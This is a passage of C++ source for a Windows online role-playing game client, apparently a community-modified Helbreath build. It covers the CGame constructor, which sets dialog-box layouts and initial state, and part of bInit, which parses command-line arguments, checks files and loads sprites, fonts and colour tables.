// Game.cpp: implementation of the CGame class.
//
//////////////////////////////////////////////////////////////////////

#include "Game.h"
#include "lan_eng.h"

extern char G_cSpriteAlphaDegree;

extern char G_cCmdLine[256], G_cCmdLineTokenA[120], G_cCmdLineTokenA_Lowercase[120], G_cCmdLineTokenB[120], G_cCmdLineTokenC[120], G_cCmdLineTokenD[120], G_cCmdLineTokenE[120];
extern class XSocket * G_pCalcSocket;
extern BOOL G_bIsCalcSocketConnected;
extern DWORD G_dwCalcSocketTime, G_dwCalcSocketSendTime;
extern HWND	G_hWnd, G_hEditWnd;
extern HINSTANCE G_hInstance;

char _cDrawingOrder[]            = {0, 1, 0, 0, 0, 0, 0, 1, 1};
char _cMantleDrawingOrder[]      = {0, 1, 1, 1, 0, 0, 0, 2, 2};
char _cMantleDrawingOrderOnRun[] = {0, 1, 1, 1, 1, 1, 1, 1, 1};

//////////////////////////////////////////////////////////////////////
// Construction/Destruction
//////////////////////////////////////////////////////////////////////

CGame::CGame()
{	
	int i;
	srand( (unsigned)time( NULL ) );
	ReadSettings();


	m_bToggleScreen = FALSE;

	//LifeX Fix Declaration Bugs 01/01
	DEF_STATS_LIMIT = 0;
	bDeathmatch = FALSE;

	bChangeBigItems = FALSE;
	
	m_bGrid = FALSE; //Grid - by luqah

	m_iTotalUsers = 0;
	m_iPing = 0;

	status = false;
	m_iLastMove = 0;

	m_bShowFPS = TRUE;

	m_bIsRare = false; // VAMP - gold items

	m_cDetailLevel = 2;
	m_cLoading = 0;
	m_bZoomMap = TRUE;
	m_bIsFirstConn = TRUE;
	m_iItemDropCnt = 0;
	m_bItemDrop = FALSE;
	m_bIsSpecial = FALSE;
	m_cGameMode = DEF_GAMEMODE_ONLOADING;
	m_cWhisperIndex = DEF_MAXWHISPERMSG;
	m_cGameModeCount = 0;
	ZeroMemory(m_cMapName, sizeof(m_cMapName));
	m_pGSock   = NULL;
	m_pLSock   = NULL;
	m_pMapData = NULL;
	m_cCommandCount  = 0;
	m_dwCommandTime = 0; //v2.15 SpeedHack
	m_sPlayerX = NULL;
	m_sPlayerY = NULL;
	m_sViewDX  = NULL;
	m_sViewDY  = NULL;
	m_cCommand = DEF_OBJECTSTOP;
	m_bIsObserverMode = FALSE;
	for (i = 0; i < DEF_MAXSPRITES; i++) m_pSprite[i] = NULL;
	for (i = 0; i < DEF_MAXTILES; i++) m_pTileSpr[i] = NULL;
	for (i = 0; i < DEF_MAXEFFECTSPR; i++) m_pEffectSpr[i] = NULL;
	m_pBGM = NULL;
	for (i = 0; i < DEF_MAXSOUNDEFFECTS; i++)
	{	m_pCSound[i]  = NULL;
		m_pESound[i]  = NULL;
		m_pMSound[i]  = NULL;
	}

	for (i = 0; i < DEF_MAXCHATMSGS; i++) m_pChatMsgList[i] = NULL;

	for (i = 0; i < DEF_MAXEFFECTS; i++) m_pEffectList[i] = NULL;

	for (i = 0; i < DEF_MAXITEMS; i++) m_pItemList[i] = NULL;

	for (i = 0; i < DEF_MAXBANKITEMS; i++) m_pBankList[i] = NULL;

	for (i = 0; i < 4; i++) m_pCharList[i] = NULL;
	// Snoopy: Fixed here
	for (i = 0; i < 61; i++) m_cDialogBoxOrder[i] = NULL;

	for (i = 0; i < DEF_MAXMAGICTYPE; i++) m_pMagicCfgList[i] = NULL;

	for (i = 0; i < DEF_MAXSKILLTYPE; i++) m_pSkillCfgList[i] = NULL;

	for (i = 0; i < DEF_TEXTDLGMAXLINES; i++) {
		m_pMsgTextList[i] = NULL;
		m_pMsgTextList2[i] = NULL;
		m_pAgreeMsgTextList[i] = NULL;
	}

	for (i = 0; i < DEF_MAXBUILDITEMS; i++) m_pBuildItemList[i] = NULL;

	for (i = 0; i < DEF_MAXBUILDITEMS; i++) m_pDispBuildItemList[i] = NULL;

	// Crafting:
	for (i = 0; i < DEF_MAXBUILDITEMS; i++) m_pCraftItemList[i] = NULL;
	for (i = 0; i < DEF_MAXBUILDITEMS; i++) m_pDispCraftItemList[i] = NULL;

	for (i = 0; i < DEF_MAXGAMEMSGS; i++) m_pGameMsgList[i] = NULL;

	m_pExID = NULL;

	for (i = 0; i < DEF_MAXITEMNAMES; i++) m_pItemNameList[i] = NULL;

	m_stMCursor.cPrevStatus       = DEF_CURSORSTATUS_NULL;
	m_stMCursor.dwSelectClickTime = NULL;

	ZeroMemory(m_cLogServerAddr, sizeof(m_cLogServerAddr));
	m_iGameServerMode = 2; // Snoopy: Default is INTERNET

	for (i = 0; i < DEF_MAXMENUITEMS; i++)
		m_pItemForSaleList[i] = NULL;

	// CLEROTh - INIT DIALOG BOXES

	//Character-Info Dialog(F5)
	m_stDialogBoxInfo[1].sX = 30+SCREENX;
	m_stDialogBoxInfo[1].sY = 30 + SCREENY;
	m_stDialogBoxInfo[1].sSizeX = 270;
	m_stDialogBoxInfo[1].sSizeY = 376;

	//Inventory Dialog(F6)
	m_stDialogBoxInfo[2].sX = 380 + SCREENX;
	m_stDialogBoxInfo[2].sY = 210 + SCREENY;
	m_stDialogBoxInfo[2].sSizeX = 225;
	m_stDialogBoxInfo[2].sSizeY = 185;

	//Magic Circle Dialog(F7)
	m_stDialogBoxInfo[3].sX = 337 + SCREENX;
	m_stDialogBoxInfo[3].sY = 57 + SCREENY;
	m_stDialogBoxInfo[3].sSizeX = 258;//280;
	m_stDialogBoxInfo[3].sSizeY = 328;//346;

	// Item drop confirmation
	m_stDialogBoxInfo[4].sX = 0 + SCREENX;
	m_stDialogBoxInfo[4].sY = 0 + SCREENY;
	m_stDialogBoxInfo[4].sSizeX = 270;
	m_stDialogBoxInfo[4].sSizeY = 105;

	// Age <15 box !?!?!?
	m_stDialogBoxInfo[5].sX = 0 + SCREENX;
	m_stDialogBoxInfo[5].sY = 0 + SCREENY;
	m_stDialogBoxInfo[5].sSizeX = 310;
	m_stDialogBoxInfo[5].sSizeY = 170;

	// ** This is a battle area **
	m_stDialogBoxInfo[6].sX = 0 + SCREENX;
	m_stDialogBoxInfo[6].sY = 0 + SCREENY;
	m_stDialogBoxInfo[6].sSizeX = 310;
	m_stDialogBoxInfo[6].sSizeY = 170;

	//Guild Menu Dialog
	m_stDialogBoxInfo[7].sX = 337 + SCREENX;
	m_stDialogBoxInfo[7].sY = 57 + SCREENY;
	m_stDialogBoxInfo[7].sSizeX = 258;
	m_stDialogBoxInfo[7].sSizeY = 339;

	//Guild Operation Dialog
	m_stDialogBoxInfo[8].sX = 337 + SCREENX;
	m_stDialogBoxInfo[8].sY = 57 + SCREENY;
	m_stDialogBoxInfo[8].sSizeX = 295;
	m_stDialogBoxInfo[8].sSizeY = 346;

	//Guide Map Dialog
#ifdef RES_HIGH
	m_stDialogBoxInfo[9].sX = 672; //LifeX Fix Map
#else
	m_stDialogBoxInfo[9].sX = 512;
#endif
	m_stDialogBoxInfo[9].sY = 0;
	m_stDialogBoxInfo[9].sSizeX = 128;
	m_stDialogBoxInfo[9].sSizeY = 128;

	//Chatting History Dialog(F9)
	m_stDialogBoxInfo[10].sX = 135 + SCREENX;
	m_stDialogBoxInfo[10].sY = 273 + SCREENY;
	m_stDialogBoxInfo[10].sSizeX = 364;
	m_stDialogBoxInfo[10].sSizeY = 162;

	//Sale Menu Dialog
	m_stDialogBoxInfo[11].sX = 70 + SCREENX;
	m_stDialogBoxInfo[11].sY = 50 + SCREENY;
	m_stDialogBoxInfo[11].sSizeX = 258;
	m_stDialogBoxInfo[11].sSizeY = 339;

	//Level-Up Setting Dialog
	m_stDialogBoxInfo[12].sX = 0 + SCREENX;
	m_stDialogBoxInfo[12].sY = 0 + SCREENY;
	m_stDialogBoxInfo[12].sSizeX = 258;
	m_stDialogBoxInfo[12].sSizeY = 339;

	//City Hall Menu Dialog
	m_stDialogBoxInfo[13].sX = 337 + SCREENX;
	m_stDialogBoxInfo[13].sY = 57 + SCREENY;
	m_stDialogBoxInfo[13].sSizeX = 258;
	m_stDialogBoxInfo[13].sSizeY = 339;

	//Bank Dialog
	m_stDialogBoxInfo[14].sX = 60 + SCREENX; //337
	m_stDialogBoxInfo[14].sY = 50 + SCREENY;
	m_stDialogBoxInfo[14].sSizeX = 258;
	m_stDialogBoxInfo[14].sSizeY = 339;
	m_stDialogBoxInfo[14].sV1 = 13;

	//Skill Menu(F8)
	m_stDialogBoxInfo[15].sX = 337 + SCREENX;
	m_stDialogBoxInfo[15].sY = 57 + SCREENY;
	m_stDialogBoxInfo[15].sSizeX = 258;
	m_stDialogBoxInfo[15].sSizeY = 339;

	//Magic Shop Menu
	m_stDialogBoxInfo[16].sX = 30 + SCREENX;
	m_stDialogBoxInfo[16].sY = 30 + SCREENY;
	m_stDialogBoxInfo[16].sSizeX = 304;
	m_stDialogBoxInfo[16].sSizeY = 328;

	//Dialog items drop external screen
	m_stDialogBoxInfo[17].sX = 0 + SCREENX;
	m_stDialogBoxInfo[17].sY = 0 + SCREENY;
	m_stDialogBoxInfo[17].sSizeX = 215;
	m_stDialogBoxInfo[17].sSizeY = 87;

	//Text Dialog
	m_stDialogBoxInfo[18].sX = 20 + SCREENX;
	m_stDialogBoxInfo[18].sY = 65 + SCREENY;
	m_stDialogBoxInfo[18].sSizeX = 258; // 238
	m_stDialogBoxInfo[18].sSizeY = 339; // 274

	//System Menu Dialog(F12)
	m_stDialogBoxInfo[19].sX = 337 + SCREENX;
	m_stDialogBoxInfo[19].sY = 107 + SCREENY;
	m_stDialogBoxInfo[19].sSizeX = 258; //v2.18
	m_stDialogBoxInfo[19].sSizeY = 268;

	//NpcActionQuery Dialog
	m_stDialogBoxInfo[20].sX = 237 + SCREENX;
	m_stDialogBoxInfo[20].sY = 57 + SCREENY;
	m_stDialogBoxInfo[20].sSizeX = 252;
	m_stDialogBoxInfo[20].sSizeY = 87;

	//NpcTalk Dialog
	m_stDialogBoxInfo[21].sX = 337 + SCREENX;
	m_stDialogBoxInfo[21].sY = 57 + SCREENY;
	m_stDialogBoxInfo[21].sSizeX = 258;
	m_stDialogBoxInfo[21].sSizeY = 339;

	//Map
	m_stDialogBoxInfo[22].sX = 336 + SCREENX;
	m_stDialogBoxInfo[22].sY = 88 + SCREENY;
	m_stDialogBoxInfo[22].sSizeX = 270;
	m_stDialogBoxInfo[22].sSizeY = 346;

	//ItemSellorRepair Dialog
	m_stDialogBoxInfo[23].sX = 337 + SCREENX;
	m_stDialogBoxInfo[23].sY = 57 + SCREENY;
	m_stDialogBoxInfo[23].sSizeX = 258;
	m_stDialogBoxInfo[23].sSizeY = 339;

	//Fishing Dialog
	m_stDialogBoxInfo[24].sX = 193 + SCREENX;
	m_stDialogBoxInfo[24].sY = 241 + SCREENY;
	m_stDialogBoxInfo[24].sSizeX = 263;
	m_stDialogBoxInfo[24].sSizeY = 100;

	//Noticement Dialog
	m_stDialogBoxInfo[25].sX = 162 + SCREENX;
	m_stDialogBoxInfo[25].sY = 40 + SCREENY;
	m_stDialogBoxInfo[25].sSizeX = 315;
	m_stDialogBoxInfo[25].sSizeY = 171;

	//Manufacture Dialog
	m_stDialogBoxInfo[26].sX = 100 + SCREENX;
	m_stDialogBoxInfo[26].sY = 60 + SCREENY;
	m_stDialogBoxInfo[26].sSizeX = 258;
	m_stDialogBoxInfo[26].sSizeY = 339;

	//Exchange Dialog
	m_stDialogBoxInfo[27].sX = 100 + SCREENX;
	m_stDialogBoxInfo[27].sY = 30 + SCREENY;
	m_stDialogBoxInfo[27].sSizeX = 520;
	m_stDialogBoxInfo[27].sSizeY = 357;

	//Quest Dialog
	m_stDialogBoxInfo[28].sX = 0 + SCREENX;
	m_stDialogBoxInfo[28].sY = 0 + SCREENY;
	m_stDialogBoxInfo[28].sSizeX = 258;
	m_stDialogBoxInfo[28].sSizeY = 339;

	//Gauge Pannel
	m_stDialogBoxInfo[29].sX = 0; //80;
	m_stDialogBoxInfo[29].sY = 434;
	m_stDialogBoxInfo[29].sSizeX = 157;
	m_stDialogBoxInfo[29].sSizeY = 53;

	//Icon Pannel
#ifdef RES_HIGH
	m_stDialogBoxInfo[30].sX = 80;
	m_stDialogBoxInfo[30].sY = 548; // 547
#else
	m_stDialogBoxInfo[30].sX = 0;
	m_stDialogBoxInfo[30].sY = 427;
	
#endif
	m_stDialogBoxInfo[30].sSizeX = 640;
	m_stDialogBoxInfo[30].sSizeY = 53;

	//Sell List Dialog
	m_stDialogBoxInfo[31].sX = 170 + SCREENX;
	m_stDialogBoxInfo[31].sY = 70 + SCREENY;
	m_stDialogBoxInfo[31].sSizeX = 258;
	m_stDialogBoxInfo[31].sSizeY = 339;

	//Party Dialog
	m_stDialogBoxInfo[32].sX = 0 + SCREENX;
	m_stDialogBoxInfo[32].sY = 0 + SCREENY;
	m_stDialogBoxInfo[32].sSizeX = 258;
	m_stDialogBoxInfo[32].sSizeY = 339;

	//Crusade Job Dialog
	m_stDialogBoxInfo[33].sX = 360 + SCREENX;
	m_stDialogBoxInfo[33].sY = 65 + SCREENY;
	m_stDialogBoxInfo[33].sSizeX = 258;
	m_stDialogBoxInfo[33].sSizeY = 339;

	//Item Upgrade Dialog
	m_stDialogBoxInfo[34].sX = 60 + SCREENX;
	m_stDialogBoxInfo[34].sY = 50 + SCREENY;
	m_stDialogBoxInfo[34].sSizeX = 258;
	m_stDialogBoxInfo[34].sSizeY = 339;

	//Help Menu Dialog(F1)
	m_stDialogBoxInfo[35].sX = 358 + SCREENX;
	m_stDialogBoxInfo[35].sY = 65 + SCREENY;
	m_stDialogBoxInfo[35].sSizeX = 258;
	m_stDialogBoxInfo[35].sSizeY = 339;

	//Crusade Commander Dialog
	m_stDialogBoxInfo[36].sX = 20 + SCREENX;
	m_stDialogBoxInfo[36].sY = 20 + SCREENY;
	m_stDialogBoxInfo[36].sSizeX = 310;
	m_stDialogBoxInfo[36].sSizeY = 386;

	//Crusade Constructor Dialog
	m_stDialogBoxInfo[37].sX = 20 + SCREENX;
	m_stDialogBoxInfo[37].sY = 20 + SCREENY;
	m_stDialogBoxInfo[37].sSizeX = 310;
	m_stDialogBoxInfo[37].sSizeY = 386;

	//Crusade Soldier Dialog
	m_stDialogBoxInfo[38].sX = 20 + SCREENX;
	m_stDialogBoxInfo[38].sY = 20 + SCREENY;
	m_stDialogBoxInfo[38].sSizeX = 310;
	m_stDialogBoxInfo[38].sSizeY = 386;

	// Give item ???
	m_stDialogBoxInfo[39].sX = 0 + SCREENX;
	m_stDialogBoxInfo[39].sY = 0 + SCREENY;
	m_stDialogBoxInfo[39].sSizeX = 291;
	m_stDialogBoxInfo[39].sSizeY = 413;

	// 3.51 Slates Dialog - Diuuude
	m_stDialogBoxInfo[40].sX = 100 + SCREENX;
	m_stDialogBoxInfo[40].sY = 60 + SCREENY;
	m_stDialogBoxInfo[40].sSizeX = 258;
	m_stDialogBoxInfo[40].sSizeY = 339;

	// Snoopy: Item exchange confirmation
	m_stDialogBoxInfo[41].sX = 285 + SCREENX;
	m_stDialogBoxInfo[41].sY = 200 + SCREENY;
	m_stDialogBoxInfo[41].sSizeX = 270;
	m_stDialogBoxInfo[41].sSizeY = 105;

	// MJ Stats Change DialogBox - Diuuude
	m_stDialogBoxInfo[42].sX = 0 + SCREENX;
	m_stDialogBoxInfo[42].sY = 0 + SCREENY;
	m_stDialogBoxInfo[42].sSizeX = 258;
	m_stDialogBoxInfo[42].sSizeY = 339;

	// Snoopy: Resurection
	m_stDialogBoxInfo[50].sX = 185 + SCREENX;
	m_stDialogBoxInfo[50].sY = 100 + SCREENY;
	m_stDialogBoxInfo[50].sSizeX = 270;
	m_stDialogBoxInfo[50].sSizeY = 105;

	//Guild Hall Menu Dialog
	m_stDialogBoxInfo[51].sX = 337 + SCREENX;
	m_stDialogBoxInfo[51].sY = 57 + SCREENY;
	m_stDialogBoxInfo[51].sSizeX = 258;
	m_stDialogBoxInfo[51].sSizeY = 339;

	//friend list
	m_stDialogBoxInfo[43].sX = 337 + SCREENX;
	m_stDialogBoxInfo[43].sY = 57 + SCREENY;
	m_stDialogBoxInfo[43].sSizeX = 258;
	m_stDialogBoxInfo[43].sSizeY = 339;

	//Item Enchant Dialog
	m_stDialogBoxInfo[44].sX = 60 + SCREENX;
	m_stDialogBoxInfo[44].sY = 50 + SCREENY;
	m_stDialogBoxInfo[44].sSizeX = 258;
	m_stDialogBoxInfo[44].sSizeY = 339;

	//50Cent - Repair All
    m_stDialogBoxInfo[52].sX = 337 + SCREENX;
    m_stDialogBoxInfo[52].sY = 57 + SCREENY;
    m_stDialogBoxInfo[52].sSizeX = 258;
    m_stDialogBoxInfo[52].sSizeY = 339;

	//50Cent - Quest Helper
    m_stDialogBoxInfo[55].sX = 530 + SCREENX;
    m_stDialogBoxInfo[55].sY = 130 + SCREENY;
    m_stDialogBoxInfo[55].sSizeX = 110;
    m_stDialogBoxInfo[55].sSizeY = 36;

	// VAMP - Online Users List
	m_stDialogBoxInfo[60].sX = 70 + SCREENX;
	m_stDialogBoxInfo[60].sY = 50 + SCREENY;
	m_stDialogBoxInfo[60].sSizeX = 258;
	m_stDialogBoxInfo[60].sSizeY = 339;

	//50Cent - GMPanel - Teleport
   	m_stDialogBoxInfo[53].sX = 358 + SCREENX;
   	m_stDialogBoxInfo[53].sY = 65 + SCREENY;
   	m_stDialogBoxInfo[53].sSizeX = 258;
   	m_stDialogBoxInfo[53].sSizeY = 339;

	//50Cent - GMPanel - Summon
   	m_stDialogBoxInfo[54].sX = 358 + SCREENX;
   	m_stDialogBoxInfo[54].sY = 65 + SCREENY;
   	m_stDialogBoxInfo[54].sSizeX = 258;
   	m_stDialogBoxInfo[54].sSizeY = 339;

	//MORLA 2.3 - Sale Menu Dialog 2
	m_stDialogBoxInfo[57].sX = 70 + SCREENX;
	m_stDialogBoxInfo[57].sY = 50 + SCREENY;
	m_stDialogBoxInfo[57].sSizeX = 258;
	m_stDialogBoxInfo[57].sSizeY = 339;

	//50Cent - GMPanel
    m_stDialogBoxInfo[56].sX = 358 + SCREENX;
    m_stDialogBoxInfo[56].sY = 65 + SCREENY;
    m_stDialogBoxInfo[56].sSizeX = 258;
    m_stDialogBoxInfo[56].sSizeY = 339;

	//50Cent - GMPanel // MORLA 2.9 // Top Server
    m_stDialogBoxInfo[59].sX = 358 + SCREENX;
    m_stDialogBoxInfo[59].sY = 65 + SCREENY;
    m_stDialogBoxInfo[59].sSizeX = 258;
    m_stDialogBoxInfo[59].sSizeY = 339;

	//Guild Bank Dialog
	m_stDialogBoxInfo[58].sX = 60 + SCREENX; //337
	m_stDialogBoxInfo[58].sY = 50 + SCREENY;
	m_stDialogBoxInfo[58].sSizeX = 258;
	m_stDialogBoxInfo[58].sSizeY = 339;
	m_stDialogBoxInfo[58].sV1 = 13;

	m_bCtrlPressed  = FALSE;
	m_bShiftPressed = FALSE;
	m_bEnterPressed = FALSE;
	m_bEscPressed	= FALSE;
	m_bSoundFlag = FALSE;
	m_dwDialogCloseTime = 0;
	m_iTimeLeftSecAccount = NULL;
	m_iTimeLeftSecIP      = NULL;
	m_bWhisper = TRUE;
	m_bShout   = TRUE;
}

CGame::~CGame()
{}

BOOL CGame::bInit(HWND hWnd, HINSTANCE hInst, char * pCmdLine)
{int iIndex;
 int i;
 class CStrTok * pStrTok;
 char seps[] = "&= ,\t\n";
 char * token;

#ifdef DEF_ANTI_HACK
	 if (CheckProcesses() == TRUE)
	 {
		 MessageBox(m_hWnd, "No Hacks Programs Permitted.", "ERROR2", MB_ICONEXCLAMATION | MB_OK);
		 return FALSE;
	 }
#endif

 // CLEROTH - BUG
	for (i = 0; i < DEF_MAXSPRITES; i++)
		m_pSprite[i] = NULL;
	if (pCmdLine != NULL)
	{	ZeroMemory(G_cCmdLine, sizeof(G_cCmdLine));
		ZeroMemory(G_cCmdLineTokenA, sizeof(G_cCmdLineTokenA));
		ZeroMemory(G_cCmdLineTokenB, sizeof(G_cCmdLineTokenB));
		ZeroMemory(G_cCmdLineTokenC, sizeof(G_cCmdLineTokenC));
		ZeroMemory(G_cCmdLineTokenD, sizeof(G_cCmdLineTokenD));
		ZeroMemory(G_cCmdLineTokenE, sizeof(G_cCmdLineTokenE));

		strcpy(G_cCmdLine, pCmdLine);

		iIndex = 0;
		pStrTok = new class CStrTok(pCmdLine, seps);
		token = pStrTok->pGet();
		while( token != NULL )
		{	switch (iIndex) {
			case 0:	strcpy(G_cCmdLineTokenA, token); break;
			case 1: strcpy(G_cCmdLineTokenB, token); break;
			case 2: strcpy(G_cCmdLineTokenC, token); break;
			case 3: strcpy(G_cCmdLineTokenD, token); break;
			case 4: strcpy(G_cCmdLineTokenE, token); break;
			}
			token = pStrTok->pGet();
			iIndex++;
		}
		delete pStrTok;
	}

	ZeroMemory(G_cCmdLineTokenA_Lowercase, sizeof(G_cCmdLineTokenA_Lowercase));
	strcpy(G_cCmdLineTokenA_Lowercase, G_cCmdLineTokenA);
	_strlwr(G_cCmdLineTokenA_Lowercase);

	if (memcmp(G_cCmdLineTokenA_Lowercase, "/egparam", 8) == 0)
	{	ZeroMemory(G_cCmdLineTokenA, sizeof(G_cCmdLineTokenA));
		memcpy(G_cCmdLineTokenA,"dataq",5);
	}
	m_hWnd = hWnd;
	m_bCommandAvailable = TRUE;
	m_pCGameMonitor = NULL;
	m_dwTime = G_dwGlobalTime;
	m_bSoundFlag = m_DSound.Create(m_hWnd);
	m_bMusicStat = m_bSoundStat = m_bSoundFlag;
	m_bIsHideLocalCursor = FALSE;
	m_cEnterCheck = m_cTabCheck = m_cLeftArrowCheck = NULL;

	if (bCheckImportantFile() == FALSE)
	{	MessageBox(m_hWnd, "File checksum error! Get Update again please!", "ERROR1", MB_ICONEXCLAMATION | MB_OK);
		return FALSE;
	}

	if (_bDecodeBuildItemContents() == FALSE)
	{	MessageBox(m_hWnd, "File checksum error! Get Update again please!","ERROR2",MB_ICONEXCLAMATION | MB_OK);
		return FALSE;
	}

	bReadIp();
	
	if(bReadItemNameConfigFile() == FALSE)
	{	MessageBox(m_hWnd, "ItemName.cfg file contains wrong infomation.","ERROR",MB_ICONEXCLAMATION | MB_OK);
		return FALSE;
	}

	if (bInitMagicCfgList() == FALSE) {
		MessageBox(m_hWnd, "MAGICCFG.TXT file contains wrong infomation.","ERROR",MB_ICONEXCLAMATION | MB_OK);
		return FALSE;
	}
	// Skill
	if (bInitSkillCfgList() == FALSE)
	{	MessageBox(m_hWnd, "SKILLCFG.TXT file contains wrong infomation.","ERROR",MB_ICONEXCLAMATION | MB_OK);
		return FALSE;
	}

	if (m_DDraw.bInit(m_hWnd) == FALSE)
	{	MessageBox(m_hWnd, "This program requires DirectX7.0a!","ERROR",MB_ICONEXCLAMATION | MB_OK);
		return FALSE;
	}

	if (m_DInput.bInit(hWnd, hInst) == FALSE) {
		MessageBox(m_hWnd, "This program requires DirectX7.0a!","ERROR",MB_ICONEXCLAMATION | MB_OK);
		return FALSE;
	}

	m_hPakFile = CreateFile("sprites\\New-Dialog.pak", GENERIC_READ, NULL, NULL, OPEN_EXISTING, NULL, NULL);
	m_pSprite[DEF_SPRID_INTERFACE_ND_LOADING] = new class CSprite(m_hPakFile, &m_DDraw, "New-Dialog", 0, FALSE);
	CloseHandle(m_hPakFile);

	m_hPakFile = CreateFile("sprites\\interface2.pak", GENERIC_READ, NULL, NULL, OPEN_EXISTING, NULL, NULL);
	m_pSprite[DEF_SPRID_INTERFACE_ADDINTERFACE] = new class CSprite(m_hPakFile, &m_DDraw, "interface2", 0, FALSE);
	m_pSprite[DEF_SPRID_INTERFACE_CRAFTING] = new class CSprite(m_hPakFile, &m_DDraw, "interface2", 3, FALSE);
	CloseHandle(m_hPakFile);

	//Grid - by luqah
    m_hPakFile = CreateFile("sprites\\Grid.pak", GENERIC_READ, NULL, NULL, OPEN_EXISTING, NULL, NULL);
    if( m_hPakFile != INVALID_HANDLE_VALUE ) {
		m_pSprite[DEF_SPRID_INTERFACE_ND_GRID] = new class CSprite(m_hPakFile, &m_DDraw, "Grid", 0, FALSE);
		CloseHandle(m_hPakFile);
    }

	// CLEROTH - LOAD FONTS BEFORE MAIN LOADING
	m_hPakFile = CreateFile("sprites\\interface2.pak", GENERIC_READ, NULL, NULL, OPEN_EXISTING, NULL, NULL);
	if( m_hPakFile != INVALID_HANDLE_VALUE )
	{	m_pSprite[DEF_SPRID_INTERFACE_SPRFONTS2] = new class CSprite(m_hPakFile, &m_DDraw, "interface2", 1, FALSE);
		m_pSprite[DEF_SPRID_INTERFACE_F1HELPWINDOWS] = new class CSprite(m_hPakFile, &m_DDraw, "interface2", 2, FALSE);
		CloseHandle(m_hPakFile);
	}

	m_hPakFile = CreateFile("sprites\\sprfonts.pak", GENERIC_READ, NULL, NULL, OPEN_EXISTING, NULL, NULL);
	if( m_hPakFile != INVALID_HANDLE_VALUE )
	{	m_pSprite[DEF_SPRID_INTERFACE_FONT1] = new class CSprite(m_hPakFile, &m_DDraw, "sprfonts", 0, FALSE);
		m_pSprite[DEF_SPRID_INTERFACE_FONT2] = new class CSprite(m_hPakFile, &m_DDraw, "sprfonts", 1, FALSE);
		CloseHandle(m_hPakFile);
	}

	m_stMCursor.sX = 0;
	m_stMCursor.sY = 0;
	m_pMapData = new class CMapData(this);
	ZeroMemory(m_cPlayerName, sizeof(m_cPlayerName));
	ZeroMemory(m_cAccountName, sizeof(m_cAccountName));
	ZeroMemory(m_cAccountPassword, sizeof(m_cAccountPassword));

	m_sPlayerType = 2;
	m_cPlayerTurn = 0;
// Snoopy: fixed here
	m_cDialogBoxOrder[60] = 29;
	m_cDialogBoxOrder[59] = 30; // 29 GaugePannel

	m_cMenuDir    = 4;
	m_cMenuDirCnt = 0;
	m_cMenuFrame  = 0;

	m_cSoundVolume = 100;
	m_cMusicVolume = 100;

	m_Misc.ColorTransfer(m_DDraw.m_cPixelFormat, RGB(  70,  70,  80), &m_wWR[1], &m_wWG[1], &m_wWB[1]); // Light-blue
	m_Misc.ColorTransfer(m_DDraw.m_cPixelFormat, RGB(  70,  70,  80), &m_wWR[2], &m_wWG[2], &m_wWB[2]); // light-blue
	m_Misc.ColorTransfer(m_DDraw.m_cPixelFormat, RGB(  70,  70,  80), &m_wWR[3], &m_wWG[3], &m_wWB[3]); // light-blue
	m_Misc.ColorTransfer(m_DDraw.m_cPixelFormat, RGB(  70, 100,  70), &m_wWR[4], &m_wWG[4], &m_wWB[4]); // Green
	m_Misc.ColorTransfer(m_DDraw.m_cPixelFormat, RGB( 130,  90,  10), &m_wWR[5], &m_wWG[5], &m_wWB[5]); // Critical
	m_Misc.ColorTransfer(m_DDraw.m_cPixelFormat, RGB(  42,  53, 111), &m_wWR[6], &m_wWG[6], &m_wWB[6]); // Heavy-blue
	m_Misc.ColorTransfer(m_DDraw.m_cPixelFormat, RGB( 145, 145, 145), &m_wWR[7], &m_wWG[7], &m_wWB[7]); // White
	m_Misc.ColorTransfer(m_DDraw.m_cPixelFormat, RGB( 120, 100, 120), &m_wWR[8], &m_wWG[8], &m_wWB[8]); // Violet
	m_Misc.ColorTransfer(m_DDraw.m_cPixelFormat, RGB(  75,  10,  10), &m_wWR[9], &m_wWG[9], &m_wWB[9]); // Heavy-Red
	m_Misc.ColorTransfer(m_DDraw.m_cPixelFormat, RGB( 135, 104,  30), &m_wR[10], &m_wG[10], &m_wB[10]);	// Gold, buggy

	m_Misc.ColorTransfer(m_DDraw.m_cPixelFormat, RGB( 200/2,  200/2,  200/2),  &m_wR[0], &m_wG[0], &m_wB[0]);
	m_Misc.ColorTransfer(m_DDraw.m_cPixelFormat, RGB(0x50/2, 0x50/2, 0xC0/2),  &m_wR[1], &m_wG[1], &m_wB[1]); // Indigo Blue
	m_Misc.ColorTransfer(m_DDraw.m_cPixelFormat, RGB(    79,     79,     62),  &m_wR[2], &m_wG[2], &m_wB[2]); // Custom-Weapon Color
	m_Misc.ColorTransfer(m_DDraw.m_cPixelFormat, RGB(   135,    104,     30),  &m_wR[3], &m_wG[3], &m_wB[3]); // Gold
	m_Misc.ColorTransfer(m_DDraw.m_cPixelFormat, RGB( 255/2,   36/2,      0),  &m_wR[4], &m_wG[4], &m_wB[4]); // Crimson
	m_Misc.ColorTransfer(m_DDraw.m_cPixelFormat, RGB(    10,     60,     10),  &m_wR[5], &m_wG[5], &m_wB[5]); // Green
	m_Misc.ColorTransfer(m_DDraw.m_cPixelFormat, RGB(0x50/2, 0x50/2, 0x50/2),  &m_wR[6], &m_wG[6], &m_wB[6]); // Gray
	m_Misc.ColorTransfer(m_DDraw.m_cPixelFormat, RGB(0x5F/2, 0x9E/2, 0xA0/2),  &m_wR[7], &m_wG[7], &m_wB[7]); // Aqua
	m_Misc.ColorTransfer(m_DDraw.m_cPixelFormat, RGB(0xFF/2, 0x69/2, 0xB4/2),  &m_wR[8], &m_wG[8], &m_wB[8]); // Pink
	m_Misc.ColorTransfer(m_DDraw.m_cPixelFormat, RGB(    90,     60,     90),  &m_wR[9], &m_wG[9], &m_wB[9]); // Violet

	m_Misc.ColorTransfer(m_DDraw.m_cPixelFormat, RGB(     0,     35,     60),  &m_wR[10], &m_wG[10], &m_wB[10]); // Blue
	m_Misc.ColorTransfer(m_DDraw.m_cPixelFormat, RGB(0xD2/2, 0xB4/2, 0x8C/2),  &m_wR[11], &m_wG[11], &m_wB[11]); // Tan
	m_Misc.ColorTransfer(m_DDraw.m_cPixelFormat, RGB(0xBD/2, 0xB7/2, 0x6B/2),  &m_wR[12], &m_wG[12], &m_wB[12]); // Khaki
	m_Misc.ColorTransfer(m_DDraw.m_cPixelFormat, RGB(    85,     85,      8),  &m_wR[13], &m_wG[13], &m_wB[13]); // Yellow
	m_Misc.ColorTransfer(m_DDraw.m_cPixelFormat, RGB(    75,     10,     10),  &m_wR[14], &m_wG[14], &m_wB[14]); // Red
